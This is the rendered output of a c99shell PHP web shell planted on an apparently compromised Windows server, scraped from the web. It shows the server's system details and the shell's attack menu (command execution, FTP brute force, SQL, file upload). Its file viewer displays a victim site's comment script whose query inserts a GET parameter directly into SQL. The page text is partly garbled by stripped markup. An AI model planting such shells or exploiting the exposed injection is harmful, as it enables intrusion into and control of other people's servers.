!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\comments\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.44%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index2.php (5.83 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
"; echo 'Grestul error'; echo ""; echo ""; echo '

Grestul Error!

'; echo "
"; echo 'Grestul Says:'; echo 'Grestul detected the install directory. Please delete or lock this directory to view your copy of Grestul.
'; echo "
To lock this directory, create a blank folder called 'lock' in the install directory.
"; echo '
This could also be a temporary glitch, try Refreshing to see if it fixes the problem.
'; echo "
If you haven't yet installed the software, please do so by visiting the install directory in your browser."; echo "
"; echo ""; echo "
"; echo "Grestul Systems"; return; } ?> <?php echo "$webname"; ?>
'; $pages = (int)($count / $per_page); if ($pages == 0) $pages=1; else if ($count % $per_page > 0) ++$pages; $cur_page = (int)$_GET['page']; if (!isset($cur_page)) $cur_page = 1; if ($cur_page < 1) $cur_page = 1; else if ($cur_page > $pages) $cur_page = (int)$pages; else echo $pages .' pages - '; echo 'Pagina: '.$cur_page.'

'."\n"; echo '
'; // Time to create the power of Pagination with style echo ''; // Lets organize them shall we $req = 'SELECT ID, name, datetime, comment, id2 FROM comments where id2='.$_GET['id'].' ORDER BY ID desc limit ' .(($cur_page-1)*$per_page) . ", $per_page "; $result = mysql_query ($req,$db); while($row = mysql_fetch_assoc($result)) { mysql_real_escape_string($name = stripslashes(htmlentities($row['name']))); mysql_real_escape_string($comment = stripslashes(htmlentities($row['comment']))); $datetime = date("M-jS-o", $row['datetime']); echo '
'."\n"; echo '

'."\n"; echo ' '; // Url detection for future version if ($url && preg_match("/(www\.)", "/(http:\.)", $url)) { echo ''.$name.''; } else { echo "$name"; } // time to get the time working echo ' Enviado: '.$datetime.'

'."\n"; echo '
'."\n\n"; // How about the comment? echo '
'."\n"; echo '

'.(nl2br($comment)).'

'."\n"; echo '
'."\n\n"; echo '
'."\n\n"; } ?>
Comentarios

'; echo ' Please enter your name!'; echo '
'; } if (!empty($_GET['errorm'])) { echo '
'; echo ' Please enter a message!'; echo '
'; } // lets submit the form if(isset($_POST['submit'])) { $comment = trim($_POST['comment']); $name = trim($_POST['name']); if ($name =="") { header("Location: ?errorn=1#err"); } elseif ($comment =="") { header("Location: ?errorm=1#err"); } else { header("Location: $domain#comments"); $ip = $_SERVER["REMOTE_ADDR"]; $datetime = time(); $name = SafeAddSlashes($name); $comment = SafeAddSlashes($comment); $sql="INSERT INTO comments (name, comment, ip, datetime, id2) VALUES ('$name', '$comment', '$ip', '$datetime', '$identi')"; $result = mysql_query($sql, $db); exit; } } ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--